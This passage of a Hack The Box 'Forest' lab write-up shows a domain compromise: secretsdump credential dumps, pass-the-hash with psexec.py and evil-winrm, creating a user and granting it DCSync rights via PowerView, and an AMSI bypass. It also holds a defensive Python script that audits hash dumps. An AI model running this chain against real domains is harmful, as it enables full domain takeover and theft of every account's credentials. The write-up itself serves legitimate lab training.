[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---
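The credential lines secretsdump.py prints are in pwdump format, domain\user:rid:lmhash:nthash:::. As an added example (not from this writeup or from impacket), the Python below parses that format and produces the findings a defender would take from an NTDS extract: accounts whose NT hash is that of an empty password, accounts that still store an LM hash, and sets of accounts sharing one password. The sample dump is constructed; only the two empty-password hash constants are real values.

```python
import collections

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when LM storage is off

# Constructed sample in the exact shape of the output above; every hash is
# made up except the well-known empty-password values.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\alice:1101:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\bob:1102:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\svc-test:1103:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\carol:1104:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
HOST01$:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
[*] Kerberos keys grabbed
"""


def parse_dump(text):
    """Yield (account, rid, lmhash, nthash) for each credential line and skip
    the tool's status lines, which do not have the seven colon-separated fields."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[1].isdigit():
            continue
        account, rid = parts[0], int(parts[1])
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(nt) != 32 or len(lm) != 32:
            continue
        yield account, rid, lm, nt


def audit_dump(text, ignore_machine_accounts=True):
    """Return the password-hygiene findings for a dump; machine accounts
    (names ending in $) have random passwords and are skipped by default."""
    empty, lm_present = [], []
    by_hash = collections.defaultdict(list)
    for account, rid, lm, nt in parse_dump(text):
        if ignore_machine_accounts and account.endswith("$"):
            continue
        if nt == EMPTY_NT:
            empty.append(account)
        if lm != EMPTY_LM:
            lm_present.append(account)
        by_hash[nt].append(account)
    shared = {h: users for h, users in by_hash.items()
              if len(users) > 1 and h != EMPTY_NT}
    return {"empty_password": empty,
            "lm_hash_stored": lm_present,
            "shared_password": shared}


if __name__ == "__main__":
    for finding, value in audit_dump(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```

The empty NT hash also shows up on disabled built-ins such as Guest and DefaultAccount and on Exchange's system mailboxes (as in the real output above), so the empty-password list needs to be cross-checked against each account's disabled flag before it becomes a ticket. Shared hashes across human accounts, on the other hand, are almost always a real finding.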

secretsdump.py gives me every hash in the domain, including the Administrator NT hash, which I can pass straight to psexec.py for a SYSTEM shell:

root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc

An alternative route, without ntlmrelayx: create a user with net user straight from the Evil-WinRM shell, add it to the relevant groups and grant it DCSync rights with PowerView's Add-ObjectACL.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puck abc123! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" puck /add


The command completed successfully.


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1


Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-DomainGroupMember 
[+] Add-DomainObjectAcl 
[+] Add-RemoteConnection 
[+] Add-Win32Type 
[+] Convert-ADName 
[+] Convert-DNSRecord 
[+] ConvertFrom-LDAPLogonHours 
[+] ConvertFrom-SID 
[+] ConvertFrom-UACValue 
[+] Convert-LDAPProperty 
[+] ConvertTo-SID 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Export-PowerViewCSV 
[+] field 
[+] Find-DomainLocalGroupMember 
[+] Find-DomainObjectPropertyOutlier 
[+] Find-DomainProcess 
[+] Find-DomainShare 
[+] Find-DomainUserEvent 
[+] Find-DomainUserLocation 
[+] Find-InterestingDomainAcl 
[+] Find-InterestingDomainShareFile 
[+] Find-InterestingFile 
[+] Find-LocalAdminAccess 
[+] func 
[+] Get-Domain 
[+] Get-DomainComputer 
[+] Get-DomainController 
[+] Get-DomainDFSShare 
[+] Get-DomainDNSRecord 
[+] Get-DomainDNSZone 
[+] Get-DomainFileServer 
[+] Get-DomainForeignGroupMember 
[+] Get-DomainForeignUser 
[+] Get-DomainGPO 
[+] Get-DomainGPOComputerLocalGroupMapping 
[+] Get-DomainGPOLocalGroup 
[+] Get-DomainGPOUserLocalGroupMapping 
[+] Get-DomainGroup 
[+] Get-DomainGroupMember 
[+] Get-DomainGroupMemberDeleted 
[+] Get-DomainGUIDMap 
[+] Get-DomainManagedSecurityGroup 
[+] Get-DomainObject 
[+] Get-DomainObjectAcl 
[+] Get-DomainObjectAttributeHistory 
[+] Get-DomainObjectLinkedAttributeHistory 
[+] Get-DomainOU 
[+] Get-DomainPolicyData 
[+] Get-DomainSearcher 
[+] Get-DomainSID 
[+] Get-DomainSite 
[+] Get-DomainSPNTicket 
[+] Get-DomainSubnet 
[+] Get-DomainTrust 
[+] Get-DomainTrustMapping 
[+] Get-DomainUser 
[+] Get-DomainUserEvent 
[+] Get-Forest 
[+] Get-ForestDomain 
[+] Get-ForestGlobalCatalog 
[+] Get-ForestSchemaClass 
[+] Get-ForestTrust 
[+] Get-GPODelegation 
[+] Get-GptTmpl 
[+] Get-GroupsXML 
[+] Get-IniContent 
[+] Get-NetComputerSiteName 
[+] Get-NetLocalGroup 
[+] Get-NetLocalGroupMember 
[+] Get-NetLoggedon 
[+] Get-NetRDPSession 
[+] Get-NetSession 
[+] Get-NetShare 
[+] Get-PathAcl 
[+] Get-PrincipalContext 
[+] Get-RegLoggedOn 
[+] Get-WMIProcess 
[+] Get-WMIRegCachedRDPConnection 
[+] Get-WMIRegLastLoggedOn 
[+] Get-WMIRegMountedDrive 
[+] Get-WMIRegProxy 
[+] Invoke-Binary 
[+] Invoke-Kerberoast 
[+] Invoke-RevertToSelf 
[+] Invoke-UserImpersonation 
[+] New-ADObjectAccessControlEntry 
[+] New-DomainGroup 
[+] New-DomainUser 
[+] New-DynamicParameter 
[+] New-InMemoryModule 
[+] New-ThreadedFunction 
[+] psenum 
[+] Remove-DomainGroupMember 
[+] Remove-DomainObjectAcl 
[+] Remove-RemoteConnection 
[+] Resolve-IPAddress 
[+] Set-DomainObject 
[+] Set-DomainObjectOwner 
[+] Set-DomainUserPassword 
[+] struct 
[+] Test-AdminAccess
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>


┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $python3 secretsdump.py htb/puck@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:abc123!
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
puck:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
[*] Cleaning up... 
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

Author: Puckiestyle
